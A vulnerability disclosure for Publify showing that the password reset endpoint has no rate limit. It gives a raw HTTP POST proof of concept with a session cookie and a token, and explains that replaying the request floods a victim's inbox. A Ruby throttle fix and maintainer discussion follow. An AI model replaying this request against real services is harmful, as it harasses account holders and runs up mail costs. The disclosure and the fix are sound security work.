Insufficient Granularity of Access Control in publify/publify
Reported on
Oct 12th 2021
Description
There is no rate limit on the password reset endpoint, so an attacker can send an unlimited number of password reset emails to any victim who has an account.
Proof of Concept
There is no rate limit on /users/password, so an attacker can send an unlimited number of password reset emails to any victim email address that has an account.
POST /users/password HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=bcc4763a5e705ab2f900361126dc1a92
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo-publify.herokuapp.com/users/password/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Origin: https://demo-publify.herokuapp.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
utf8=%E2%9C%93&authenticity_token=aMSmWPPXrTwPfgTcEeKEqEKfpcHJiggrpOvwt5b9MyFHfGws3tJQDfbCb9u4nQY98rXHzFnUGwUSVtbxVfLD3A%3D%3D&user%5Bemail%5D=admin%40gmail.com&commit=Send+me+reset+password+instructions
Set the user[email] POST parameter to the victim's email address. This request can be sent an unlimited number of times, and the victim's address will receive an unlimited number of password reset emails.
Impact
An attacker can send unlimited emails to any victim mail address (that has an account). Many email service providers limit email sending, for example to 1000 emails per month; if that limit is exceeded, extra charges apply. Using this attack, an attacker can push the application past that limit and the company will be charged extra money.
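One way to close the gap described above, as an added example for this page and not code from Publify or Devise: a small Ruby throttle for POST /users/password that counts reset requests per recipient address and per client IP inside a fixed time window and rejects requests once either counter is exceeded. The class name, the limits, and the sample addresses are assumptions. In a Rails deployment the same rule is normally expressed with the rack-attack gem (Rack::Attack.throttle keyed on the request path and the user[email] parameter); this version has no dependencies so it runs stand-alone.

```ruby
# Added example (not Publify or Devise code): a dependency-free throttle for the
# Devise password reset endpoint POST /users/password. Counters are kept per
# recipient e-mail and per client IP in a fixed time window; the clock is
# injectable so window expiry can be exercised deterministically.
require 'cgi'

class PasswordResetThrottle
  RESET_PATH = '/users/password'.freeze

  # Hypothetical defaults for this example: 3 reset mails per address per hour
  # protects the victim's inbox and the mail quota regardless of source IP;
  # 20 requests per IP per hour caps the total volume one client can generate.
  DEFAULT_LIMITS = {
    email: { limit: 3,  period: 3600 },
    ip:    { limit: 20, period: 3600 }
  }.freeze

  def initialize(limits: DEFAULT_LIMITS, clock: -> { Time.now.to_i })
    @limits = limits
    @clock = clock
    @counters = Hash.new { |h, k| h[k] = [] } # key => request timestamps
  end

  # env is a Rack-style hash (REQUEST_METHOD, PATH_INFO, REMOTE_ADDR, rack.input).
  # Returns :pass for requests the throttle does not cover, :allow when the reset
  # request is within limits, and :throttle when a counter is exceeded.
  def check(env)
    return :pass unless env['REQUEST_METHOD'] == 'POST' && env['PATH_INFO'] == RESET_PATH

    now = @clock.call
    keys = []
    email = recipient_email(env['rack.input'])
    keys << [:email, "email:#{email}"] if email
    ip = env['REMOTE_ADDR'].to_s
    keys << [:ip, "ip:#{ip}"] unless ip.empty?

    # Record first, then compare: a rejected request still consumes budget, so a
    # client cannot probe the limit for free.
    over = keys.map { |kind, key| record(key, now, @limits[kind][:period]) > @limits[kind][:limit] }
    over.any? ? :throttle : :allow
  end

  # Builds a Rack-style env for a reset request. Constructed sample input for this
  # example; a real Rack application receives this from the web server.
  def self.reset_env(email:, ip:, method: 'POST', path: RESET_PATH)
    body = "utf8=%E2%9C%93&user%5Bemail%5D=#{CGI.escape(email)}&commit=Send+me+reset+password+instructions"
    { 'REQUEST_METHOD' => method, 'PATH_INFO' => path, 'REMOTE_ADDR' => ip, 'rack.input' => body }
  end

  # Replays a burst of reset requests from one source against one victim address
  # and returns the decisions, so the throttle's effect is visible and testable.
  def self.demo(limit: 3)
    clock = 1_700_000_000
    limits = { email: { limit: limit, period: 3600 }, ip: { limit: 50, period: 3600 } }
    throttle = new(limits: limits, clock: -> { clock })
    victim = reset_env(email: 'victim@example.com', ip: '203.0.113.10')

    burst = Array.new(limit + 2) { throttle.check(victim) }
    other = throttle.check(reset_env(email: 'other@example.com', ip: '203.0.113.10'))
    clock += 3601 # move past the window; the victim's counter expires
    after = throttle.check(victim)

    { burst: burst, other_address: other, after_window: after }
  end

  private

  # Extracts and normalises user[email] from the form body (String or IO).
  def recipient_email(input)
    body = input.respond_to?(:read) ? input.read : input.to_s
    raw = CGI.parse(body)['user[email]']&.first.to_s.strip.downcase
    raw.empty? ? nil : raw
  end

  # Appends a timestamp, drops entries outside the window, returns the new count.
  def record(key, now, period)
    window = @counters[key]
    window << now
    window.reject! { |ts| ts <= now - period }
    window.size
  end
end

if __FILE__ == $PROGRAM_NAME
  p PasswordResetThrottle.demo
end
```

Counting per recipient address is what actually protects the account holder and the sending quota from the Impact section, because a distributed sender changes IPs but not the victim's address; the per-IP counter is a secondary cap on total volume from one client. Keep the rejection response identical in timing and wording to the normal "instructions sent" page so the throttle itself does not become an account-existence oracle.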
AFAIK, the attacker can only send unlimited email to people who actually have an account.
I have confirmed that a mail is not sent if the email address does not correspond to an existing account.
In any case, I think this is something that would have to be changed in Devise (https://github.com/heartcombo/devise).
Reference report: https://www.huntr.dev/bounties/2d3b85ec-1ff9-4226-859a-776de238b246/
https://github.com/BookStackApp/BookStack/commit/ca764caf2d55a5c9bac61718d656423b0c3a060b
How is this relevant? I cannot read that report and Publify is not written in PHP.
https://www.huntr.dev/bounties/d33cd2a3-1cff-4a9d-a0d1-df7d01e2d1e2/
Again, Publify does not use Laravel. If you don't engage with what I'm commenting here I'm going to close this as invalid.
Attacker can send unlimited email to any victim mail address.
This is incorrect. Please adjust the report to reflect the actual situation.
(Attacker can send unlimited email to people who actually have an account). The attacker abuses the forgot-password functionality: if the attacker gets a victim's mail id that has an account, they can send unlimited forgot-password requests for it, which leads to unlimited forgot-password mails being sent, because there is no rate limit on the forgot-password page. I am not saying Laravel; that is the same kind of report, for reference. No rate limit is everywhere, so please set a throttle on sending forgot-password mails.
@raptor thank you for adjusting the report.
Yes, it was already clear to me that there are similar reports.